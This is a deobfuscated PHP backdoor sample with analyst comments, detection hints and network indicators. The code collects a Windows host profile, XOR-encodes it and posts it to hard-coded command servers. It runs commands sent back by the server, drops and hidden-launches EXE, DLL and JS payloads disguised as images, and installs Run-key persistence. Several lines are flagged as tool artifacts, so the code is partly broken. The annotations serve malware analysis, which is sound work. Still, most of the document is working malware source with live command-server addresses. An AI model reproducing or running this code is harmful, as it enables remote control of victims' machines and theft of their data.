// Optional leading and trailing path segments; a length of 0 drops the segment entirely.
$USwKc = XNked(rand(0, 14));
$FjQwC = XnkeD(rand(0, 14));
return ($USwKc !== '' ? "/" . $USwKc : '') . "/" . XnkeD(rand(0, 14)) . "&" . $KyMPt . $U0J5z . ($FjQwC !== '' ? "/" . $FjQwC : '');
}
/**
 * Collects the host profile that is sent to the server on every check-in.
 *
 * Runs six PowerShell one-liners through exec() and stores their JSON output under the keys
 * "systeminfo", "processes", "services", "drives" and "arp", plus an "other" map holding the build
 * number, a random local id, the constant loader id 43, the privilege level and the type "PHP".
 *
 * Tool artifact: four of the json_decode() calls below show `null` as their first argument. The
 * obfuscated listing passes implode($pC2k6, $pcI7I) in every one of them, so the real sample does
 * report processes, services, drives and the neighbour table.
 *
 * Detection: the PHP interpreter spawning `powershell -c` with systeminfo, tasklist /svc,
 * Get-Service, Get-PSDrive and Get-NetNeighbor in quick succession.
 *
 * @return array host profile as described above
 * @throws Exception "Failed to execute command" when any of the commands exits non-zero
 */
function mNFE9()
{
global $jIDpK, $szWC8, $pC2k6;
$JGJW0 = [];
// OS and hardware inventory.
exec("powershell -c " . Eci0T("systeminfo /FO CSV | ConvertFrom-Csv | ConvertTo-Json"), $pcI7I, $xv08g);
if (!($xv08g !== 0)) {
$JGJW0["systeminfo"] = json_decode(implode($pC2k6, $pcI7I), true);
$pcI7I = '';
// Privilege level of the current token: prints SYSTEM, ADMIN or USER.
exec("powershell -c " . ECI0T("if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM') { 'SYSTEM' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 'ADMIN' } else { 'USER' } "), $pcI7I, $xv08g);
if (!($xv08g !== 0)) {
$JGJW0["other"]["version_build"] = $jIDpK;
$JGJW0["other"]["id_local"] = mt_rand(0, 100000000);
$JGJW0["other"]["id_loader"] = 43;
$JGJW0["other"]["runas"] = $pcI7I[0] ?? "UNKNOWN";
$JGJW0["other"]["type_file"] = "PHP";
$pcI7I = '';
// Running processes with their hosted services.
exec("powershell -c " . eCI0t("tasklist /svc /FO CSV | ConvertFrom-Csv | ConvertTo-Json"), $pcI7I, $xv08g);
if (!($xv08g !== 0)) {
// Tool artifact: the original argument is implode($pC2k6, $pcI7I).
$JGJW0["processes"] = json_decode(null, true);
$pcI7I = '';
// Installed services (name and display name).
exec("powershell -c " . eCI0t("Get-Service | Select-Object -Property Name, DisplayName | ConvertTo-Json"), $pcI7I, $xv08g);
if (!($xv08g !== 0)) {
// Tool artifact: the original argument is implode($pC2k6, $pcI7I).
$JGJW0["services"] = json_decode(null, true);
$pcI7I = '';
// Mounted file-system drives.
exec("powershell -c " . eci0t("Get-PSDrive -PSProvider FileSystem | ConvertTo-Json"), $pcI7I, $xv08g);
if (!($xv08g !== 0)) {
// Tool artifact: the original argument is implode($pC2k6, $pcI7I).
$JGJW0["drives"] = json_decode(null, true);
$pcI7I = '';
// IPv4 neighbour (ARP) table, reshaped to resemble `arp -a` output.
exec("powershell -c " . eCI0t("Get-NetNeighbor -AddressFamily IPv4 | Where-Object { {$_}.State -ne 'Permanent' } | Select-Object @{Name='Interface'; Expression={\$_.InterfaceAlias}}, @{Name='Internet Address'; Expression={\$_.IPAddress}}, @{Name='Physical Address'; Expression={\$_.LinkLayerAddress}}, @{Name='Type'; Expression={'dynamic'}} | ConvertTo-Json"), $pcI7I, $xv08g);
if (!($xv08g !== 0)) {
// Tool artifact: the original argument is implode($pC2k6, $pcI7I).
$JGJW0["arp"] = json_decode(null, true);
$pcI7I = '';
return $JGJW0;
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
/**
 * XORs a buffer in place with a rolling keystream derived from a short key.
 *
 * The state byte starts as the first key byte. For each position i it becomes
 * (state + state + i % 256) % 256, and the data byte is XORed with
 * (key[i % keylen] XOR state). Because the operation is a plain XOR with a keystream that depends
 * only on the key and the position, running it twice with the same key restores the input; the
 * sample calls it both before sending (A2uxo) and after receiving (mOJ2M).
 *
 * @param string $xbNO5 buffer, modified by reference
 * @param string $eAmVW key bytes; the callers on this page pass 4 bytes
 * @return void
 */
function r7s9B(&$xbNO5, $eAmVW)
{
$s9r5b = ord($eAmVW[0]);
$cbiCS = strlen($xbNO5);
$kt3y8 = strlen($eAmVW);
$Mc_Hp = 0;
// Loop head: the goto at the bottom jumps back here until every byte has been processed.
kAq95:
if (!($Mc_Hp < $cbiCS)) {
// [PHPDeobfuscator] Implied return
return;
}
// Advance the state first, then apply it to the current byte.
$s9r5b = ($s9r5b + ($s9r5b + $Mc_Hp % 256)) % 256;
$xbNO5[$Mc_Hp] = chr(ord($xbNO5[$Mc_Hp]) ^ (ord($eAmVW[$Mc_Hp % $kt3y8]) ^ $s9r5b) % 256);
++$Mc_Hp;
goto kAq95;
}
/**
 * Encodes an outgoing message: XORs it with a fresh 4-byte key, appends that key, then gzips it.
 *
 * The key is a random number packed as a 32-bit little-endian value ("V") and travels in the same
 * message, so the encoding hides content from casual inspection but offers no confidentiality.
 * For analysis of captured traffic: gunzip the POST body, take the last 4 bytes as the key and
 * apply the r7s9B() routine to the remainder.
 *
 * @param string $xbNO5 plaintext message (the JSON host profile in this sample)
 * @return string gzip-compressed (level 5) bytes of the XORed message followed by the key
 */
function A2uxo($xbNO5)
{
$Ot6LN = mt_rand(0, 100000000);
$rasAm = pack("V", $Ot6LN);
R7s9b($xbNO5, $rasAm);
$ERqBI = $xbNO5 . $rasAm;
return gzencode($ERqBI, 5, FORCE_GZIP);
}
/**
 * Sends one check-in to the server and returns the raw response.
 *
 * The request is a plain-HTTP POST (no TLS) to http://<host>:<port><path>, where the port is the
 * global $JcEot and the path comes from rXiXT(). The body is sent as application/octet-stream with
 * a 20-second timeout; "ignore_errors" makes PHP return the body of non-2xx responses as well.
 *
 * @param string $A4YkN server host name or IP address
 * @param string $xbNO5 request body, already encoded by the caller
 * @return array keys "content" (body), "headers" (all response header lines), "status" (first
 *               header line or null) and "code" (numeric status, 0 when it could not be parsed)
 * @throws Exception "HTTP request failed: ..." when file_get_contents() returns false
 */
function EtUpz($A4YkN, $xbNO5)
{
global $JcEot;
$H6YXK = ["http" => ["method" => "POST", "header" => ["Content-type: application/octet-stream"], "content" => $xbNO5, "ignore_errors" => true, "timeout" => 20]];
$nG_P0 = "http://" . $A4YkN . ":" . $JcEot . rXiXT();
$nuWcv = stream_context_create($H6YXK);
$HhbRp = null;
// Temporary handler: captures the warning text so it can be reported in the exception message.
set_error_handler(function ($l2XVo, $Mxyq3) use(&$HhbRp) {
$HhbRp = $Mxyq3;
});
$RwYxj = file_get_contents($nG_P0, false, $nuWcv);
restore_error_handler();
if (!($RwYxj === false)) {
$Ql4QK = 0;
if (!isset($http_response_header[0])) {
goto ycYgX;
}
// Extract the three-digit status code from the status line, e.g. "HTTP/1.1 200 OK".
preg_match("/HTTP\\/\\d\\.\\d\\s+(\\d{3})/", $http_response_header[0], $fUPyD);
if (!isset($fUPyD[1])) {
goto oo9y0;
}
$Ql4QK = (int) $fUPyD[1];
oo9y0:
ycYgX:
return ["content" => $RwYxj, "headers" => $http_response_header, "status" => $http_response_header[0] ?? null, "code" => $Ql4QK];
}
throw new Exception("HTTP request failed: " . ($HhbRp ?: "Unknown error"));
}
/**
 * Downloads an archive and extracts it into a directory.
 *
 * The target directory is created (mode 0777, recursive) when it does not exist. The download is
 * written to a temporary file, opened through an object of class XdeZr and unpacked with
 * extractTo().
 * NOTE(review): XdeZr is not defined anywhere on this page. The launch guard requires the "zip"
 * extension and the object is used through open()/extractTo()/close(), so this is presumably
 * ZipArchive under a mangled name; confirm against the original sample.
 *
 * @param string $nG_P0 URL of the archive; the only caller on this page passes a Node.js zip
 * @param string $Yem6z destination directory
 * @return bool true when extraction succeeded, false on any failure
 */
function Y40sz($nG_P0, $Yem6z)
{
if (file_exists($Yem6z)) {
goto qw6IQ;
}
if (mkdir($Yem6z, 0777, true)) {
qw6IQ:
// The result of the download is not checked before it is written to the temporary file.
$cTc0_ = file_get_contents($nG_P0);
$PH23F = tmpfile();
fwrite($PH23F, $cTc0_);
rewind($PH23F);
$abtZm = new XdeZr();
// The archive object is given the on-disk path of the temporary file.
$Mbxm4 = $abtZm->open(stream_get_meta_data($PH23F)["uri"]);
if (!($Mbxm4 !== true)) {
if ($abtZm->extractTo($Yem6z)) {
$abtZm->close();
fclose($PH23F);
return true;
}
$abtZm->close();
fclose($PH23F);
return false;
}
fclose($PH23F);
return false;
}
return false;
}
/**
 * Installs persistence through the current user's Run key (the AUTORUN task).
 *
 * When the sample was started from inline code, it reads its own command line with wmic, takes the
 * text after "-r", strips double quotes and saves it to a randomly named .txt file; otherwise it
 * uses its own script path. It then adds a value under
 * HKCU\Software\Microsoft\Windows\CurrentVersion\Run whose name is borrowed from an existing
 * AppData folder (VjppV) and whose data is the PHP binary followed by that file, both quoted.
 *
 * Tool artifacts: "." in the .txt path stands for dirname(PHP_BINARY) and
 * "/var/www/html/input.php" stands for __FILE__ in the obfuscated listing; both were folded using
 * the deobfuscation service's own environment.
 *
 * Detection: a Run value whose data launches a PHP interpreter with a .txt or script argument, and
 * `wmic process where processid=<pid> get commandline` or `reg add ...\Run` spawned by PHP.
 *
 * @return bool false when the command line could not be read or has no " -r "; true otherwise
 *              (the exit status of `reg add` is not checked)
 */
function UrHlx()
{
global $szWC8, $pC2k6;
if (QrOFA()) {
$oyBW1 = "." . xNked(12) . ".txt";
$ZqddJ = shell_exec("wmic process where processid=" . getmypid() . " get commandline");
if (!(!$ZqddJ || !preg_match_all("/\\s-r\\s/", $ZqddJ))) {
// Drop the header line of the wmic output and keep the command line itself.
$pDMmF = explode($pC2k6, $ZqddJ, 2);
$xU41z = trim($pDMmF[1] ?? '');
// Everything after "php.exe ... -r" is the inline code that was passed to the interpreter.
$Y72oh = preg_split("/php\\.exe.*?\\s-r\\s+/", $xU41z, 2);
$uJtGi = isset($Y72oh[1]) ? trim(str_replace($szWC8, '', $Y72oh[1])) : '';
file_put_contents($oyBW1, $uJtGi);
goto hOX6z;
}
return false;
}
$oyBW1 = "/var/www/html/input.php";
hOX6z:
exec("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v " . Eci0t(VjppV()) . " /t REG_SZ /d " . eci0t("\\" . $szWC8 . PHP_BINARY . "\\" . $szWC8 . " \\" . $szWC8 . $oyBW1 . "\\" . $szWC8) . " /f");
return true;
}
/**
 * Returns the name of a randomly chosen entry from the user's AppData directories.
 *
 * The result is used as the Run value name in UrHlx() and as the prefix of the drop directory in
 * BMLFv(), so artefacts borrow the names of software already present on the host.
 * The two scandir() lists are combined with the array `+` operator, which keeps the left-hand
 * entry for every index both lists share; %LOCALAPPDATA% entries only appear at indexes beyond the
 * length of the %APPDATA% listing. The full candidate list is printed with print_r().
 *
 * @return string one directory-entry name
 */
function vJppV()
{
$inBis = scandir(getenv("APPDATA")) + scandir(getenv("LOCALAPPDATA"));
$inBis = array_diff($inBis, [".", ".."]);
// Re-index so that a random position can be picked directly.
$inBis = array_values($inBis);
print_r($inBis);
return $inBis[rand(0, count($inBis) - 1)];
}
/**
 * Generates a random alphanumeric string (digits, lower case, upper case) using rand().
 *
 * Used on this page for URL path segments and for the names of dropped files.
 *
 * @param int $zcvYL number of characters; 0 yields an empty string
 * @return string random string of the requested length
 */
function XNKeD($zcvYL = 16)
{
$Ke3ba = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$brHta = strlen($Ke3ba);
$b3TRq = '';
$Mc_Hp = 0;
// Loop head: append one character per pass until the requested length is reached.
NWTYT:
if (!($Mc_Hp < $zcvYL)) {
return $b3TRq;
}
$b3TRq .= $Ke3ba[rand(0, $brHta - 1)];
$Mc_Hp++;
goto NWTYT;
}
// Holds the process handle and pipes of the command started by the CMD task, or null when no
// command is pending.
$wGaOo = null;
/**
 * Starts a command received from the server (the CMD task) without waiting for it to finish.
 *
 * The command string is passed to proc_open() as received, with pipes for stdin, stdout and stderr.
 * The handle is stored in the global $wGaOo; rcbqD() collects the output on a later cycle.
 *
 * @param string $d0PbW command line to run
 * @return string|null "<failed>" when the process could not be started, otherwise nothing
 */
function deG1t($d0PbW)
{
global $wGaOo;
$qA50S = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$Nr7MT = proc_open($d0PbW, $qA50S, $V8__K);
if (is_resource($Nr7MT)) {
$wGaOo = ["process" => $Nr7MT, "pipes" => $V8__K];
// [PHPDeobfuscator] Implied return
return;
}
return "<failed>";
}
/**
 * Collects the output of the command started by deG1t(), once that command has exited.
 *
 * mOJ2M() attaches a non-null result to the next check-in under the "cmd" key.
 *
 * Tool artifacts: "out:PHP_EOL" and "PHP_EOLerr(" are `"out:" . PHP_EOL` and
 * `PHP_EOL . "err("` in the obfuscated listing; the constant was folded into the string literal.
 * $last_command is never assigned inside this function, so the two echo lines print an empty name.
 *
 * @return string|null "out:" followed by stdout (or "<empty>") and, when stderr is not empty,
 *                     "err(<exit code>):" followed by stderr; null while no command is pending
 *                     or the command is still running
 */
function rcbqD()
{
global $wGaOo;
if (!(!$wGaOo || !isset($wGaOo["process"]) || !isset($wGaOo["pipes"]))) {
$Nr7MT = $wGaOo["process"];
$V8__K = $wGaOo["pipes"];
if (!proc_get_status($Nr7MT)["running"]) {
// Clear the pending slot first so that the next CMD task can start a new command.
$wGaOo = null;
$gGLsg = stream_get_contents($V8__K[1]);
$Dbe2H = stream_get_contents($V8__K[2]);
fclose($V8__K[0]);
fclose($V8__K[1]);
fclose($V8__K[2]);
// proc_close() supplies the value shown inside "err(...)".
$nSJJJ = proc_close($Nr7MT);
$PS9aF = "out:PHP_EOL";
if ($gGLsg) {
$PS9aF .= $gGLsg;
goto TkkmA;
}
$PS9aF .= "<empty>";
TkkmA:
if (!$Dbe2H) {
goto UBiN4;
}
$PS9aF .= "PHP_EOLerr(" . $nSJJJ . "):" . PHP_EOL . $Dbe2H;
UBiN4:
return $PS9aF;
}
echo "{$last_command} == running" . PHP_EOL;
return null;
}
echo "{$last_command} == null" . PHP_EOL;
return null;
}
/**
 * Launches a program without a visible window by wrapping it in PowerShell's Start-Process.
 *
 * The command is echoed and then run with shell_exec(). Double quotes in the argument string are
 * backslash-escaped before it is placed inside -ArgumentList.
 *
 * Detection: `powershell.exe -WindowStyle Hidden -c "Start-Process -WindowStyle Hidden -FilePath
 * ..."` with a PHP interpreter as parent process.
 *
 * @param string $xLjoz path of the program to start
 * @param string|null $d0PbW argument string; -ArgumentList is omitted when this is empty
 * @return void
 */
function lFVIE($xLjoz, $d0PbW)
{
global $szWC8, $pC2k6;
$o_rCT = "powershell.exe -WindowStyle Hidden -c " . ECi0t("Start-Process -WindowStyle Hidden -FilePath '" . $xLjoz . "'" . ($d0PbW ? " -ArgumentList '" . preg_replace("/" . $szWC8 . "/", "\\" . $szWC8, $d0PbW) . "'" : ''));
echo $o_rCT . $pC2k6 . $pC2k6;
shell_exec($o_rCT);
}
/**
 * Creates a drop directory under %APPDATA% and returns its path.
 *
 * The directory name is the name of an existing AppData entry (VJPpv) followed by a random number
 * between 0 and 1000000. Hunting hint: an AppData folder whose name is a known application name
 * with digits appended and which holds a single file with an 8-character random name.
 *
 * @return string path of the new directory (the result of mkdir() is not checked)
 */
function BMLFv()
{
$qHIxs = getenv("APPDATA") . "\\" . VJPpv() . rand(0, 1000000);
mkdir($qHIxs);
return $qHIxs;
}
/**
 * Performs one check-in cycle: reports to the server, decodes the reply and carries out the task.
 *
 * Request: the host profile $rst7P as JSON, plus the output of a finished command under "cmd" when
 * one is available, encoded by A2UXO() and posted by EtupZ().
 * Response: status 204 means no task. For status 200 the last 4 bytes of the body are the XOR key;
 * after decoding, the final byte is the task type (see $D_3Y7) and the rest is the payload.
 *
 * Tool artifacts: every `echo "...PHP_EOL"` below is `echo "..." . PHP_EOL` in the obfuscated
 * listing. The "\r\n" and "\r\n" sequences inside the rundll32 and node.exe paths coincide with
 * line breaks in the obfuscated listing on this page and look like a rendering problem; the paths
 * are presumably ...\System32\rundll32.exe and ...\node-v21.7.3-win-x64\node.exe. Confirm against
 * the original sample.
 *
 * @param string $A4YkN server host name or IP address
 * @return void
 * @throws Exception "HTTP request failed: <code>" for any status other than 200 or 204, and
 *                   whatever EtupZ() throws on transport failure
 */
function mOJ2M($A4YkN)
{
global $rst7P, $D_3Y7, $szWC8, $dCN4_;
// Attach the output of a previously started command, if it has finished.
if (!(($u7kKd = RCbQd()) !== null)) {
goto bVOXu;
}
$rst7P["cmd"] = $u7kKd;
bVOXu:
$uJtGi = EtupZ($A4YkN, A2UXO(json_encode($rst7P, JSON_PRETTY_PRINT)));
// The command output is sent once only.
unset($rst7P["cmd"]);
$o0HyG = $uJtGi["content"];
$Ql4QK = $uJtGi["code"];
if (!($Ql4QK == 204)) {
if (!($Ql4QK !== 200)) {
// Trailing 4 bytes are the key; strip them and decode the rest in place.
$oAl9r = substr($o0HyG, strlen($o0HyG) - 4, strlen($o0HyG));
$o0HyG = substr($o0HyG, 0, strlen($o0HyG) - 4);
R7s9B($o0HyG, $oAl9r);
// After decoding, the last byte selects the task and is removed from the payload.
$miAdf = ord($o0HyG[strlen($o0HyG) - 1]);
$o0HyG = substr($o0HyG, 0, strlen($o0HyG) - 1);
$d0PbW = null;
switch ($miAdf) {
// CMD: the payload is a command line; its output is reported on a later cycle.
case $D_3Y7["CMD"]:
echo "CMDPHP_EOL";
DEg1T($o0HyG);
return;
// ACTIVE: the payload is a 32-bit little-endian count of fast (10 s) polling cycles.
case $D_3Y7["ACTIVE"]:
echo "ACTIVEPHP_EOL";
$dCN4_ = unpack("V", $o0HyG)[1];
return;
// AUTORUN: install Run-key persistence.
case $D_3Y7["AUTORUN"]:
echo "AUTORUNPHP_EOL";
URHlX();
return;
// OFF: terminate this process.
case $D_3Y7["OFF"]:
echo "OFFPHP_EOL";
exit(0);
// EXE: the payload is written to <drop dir>\<8 random chars>.exe and launched.
case $D_3Y7["EXE"]:
echo "EXEPHP_EOL";
$xLjoz = BMlfV() . "\\" . xNkEd(8) . ".exe";
file_put_contents($xLjoz, $o0HyG);
goto nJLGE;
// DLL: the payload is written with a .png extension and passed to rundll32 with " start".
case $D_3Y7["DLL"]:
echo "DLLPHP_EOL";
$yYiH5 = bmlfV() . "\\" . XnkeD(8) . ".png";
$xLjoz = "C:\\Windows\\System32\r\nundll32.exe";
$d0PbW = ecI0T($yYiH5) . " start";
file_put_contents($yYiH5, $o0HyG);
goto nJLGE;
// JS: the payload is written with a .jpg extension and passed to node.exe. When node.exe is
// missing, the Node.js zip is first fetched over plain HTTP and unpacked into %APPDATA%.
case $D_3Y7["JS"]:
echo "JSPHP_EOL";
$xLjoz = getenv("APPDATA") . "\\" . "node-v21.7.3-win-x64\r\node.exe";
if (!(!file_exists($xLjoz) && !y40SZ("http://nodejs.org/dist/v21.7.3/node-v21.7.3-win-x64.zip", getenv("APPDATA")))) {
$d0PbW = BmLfv() . "\\" . XNKed(8) . ".jpg";
file_put_contents($d0PbW, $o0HyG);
goto nJLGE;
}
echo "failed install nodejsPHP_EOL";
return;
// Any other type: the payload is written to a .txt file and not executed.
default:
echo "OTHERPHP_EOL";
file_put_contents(BmlfV() . "\\" . XnkeD(8) . ".txt", $o0HyG);
return;
}
// Shared launch step for EXE, DLL and JS.
nJLGE:
lfViE($xLjoz, $d0PbW);
// [PHPDeobfuscator] Implied return
return;
}
throw new Exception("HTTP request failed: " . $Ql4QK);
}
echo "204PHP_EOL";
return;
}
// Main beacon loop. The two arrays below are the sample's hard-coded server addresses and serve as
// network indicators: $b2dL6 holds fallback IP addresses, $h0b7d holds the preferred host names.
// Tool artifacts: the two echo lines near the end print $LcYWr and $dCN4_ in the obfuscated
// listing; the folded "10" and "0" are not the values used at run time.
// Sleep interval in seconds between check-ins.
$LcYWr = 10;
$b2dL6 = ["159.69.187.78", "64.95.12.71", "184.95.51.165"];
$h0b7d = ["windows-msgas.com", "event-datamicrosoft.live", "varying-rentals-calgary-predict.trycloudflare.com"];
// Start with a random host name when any are configured, otherwise with a random IP address.
if (count($h0b7d) > 0) {
$A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
goto sIg7z;
}
$A4YkN = $b2dL6[mt_rand(0, 1000) % count($b2dL6)];
sIg7z:
// Failure threshold: once $dlA_m reaches 200 the catch branch picks from the IP list instead.
$TZ64Y = 200;
// Failure counter; reset to 0 by a successful check-in while it is still below the threshold.
$dlA_m = 0;
V3Oj2:
// `!true` is never satisfied, so the loop only ends through exit(0) in the OFF task.
if (!true) {
// [PHPDeobfuscator] Implied script end
return;
}
try {
echo $A4YkN . PHP_EOL;
echo $dlA_m . PHP_EOL;
moJ2m($A4YkN);
// Poll every 10 s while the ACTIVE counter is positive, otherwise every 300 s.
if ($dCN4_ > 0) {
$LcYWr = 10;
$dCN4_--;
goto iaT6S;
}
$LcYWr = 300;
iaT6S:
// Successful check-in on a fallback address: after ten of them (counter at threshold + 10) the
// counter drops to threshold - 10 and a host name is tried again.
if ($dlA_m >= $TZ64Y + 10) {
$dlA_m = $TZ64Y - 10;
if (!(count($h0b7d) > 0)) {
goto njjkr;
}
$A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
njjkr:
goto RCrAZ;
}
if ($dlA_m < $TZ64Y) {
$dlA_m = 0;
goto LWgVS;
}
$dlA_m++;
LWgVS:
RCrAZ:
} catch (Throwable $Umveq) {
// Any failure: count it, rotate to another address, retry after 10 s and leave fast-poll mode.
echo $pC2k6 . "Error: " . $Umveq->getMessage() . $pC2k6;
$dlA_m++;
if ($dlA_m < $TZ64Y && count($h0b7d) > 0) {
$A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
goto QavQA;
}
$A4YkN = $b2dL6[mt_rand(0, 1000) % count($b2dL6)];
QavQA:
$LcYWr = 10;
$dCN4_ = 0;
}
echo "delay: 10PHP_EOL";
echo "active_cnt: 0PHP_EOL";
sleep($LcYWr);
goto V3Oj2;
}
// Reached when the launch guard fails (fewer than two arguments and not inline code, or the zip
// extension is not loaded): the sample relaunches itself hidden with the zip extension enabled and
// "1" as an extra argument. "/var/www/html/input.php" stands for __FILE__ in the obfuscated listing.
// Detection: a PHP interpreter started with `-d extension=zip -d extension_dir=ext <script> 1`.
LfVIE(PHP_BINARY, "-d extension=zip -d extension_dir=ext " . ECi0T("/var/www/html/input.php") . " 1");
return;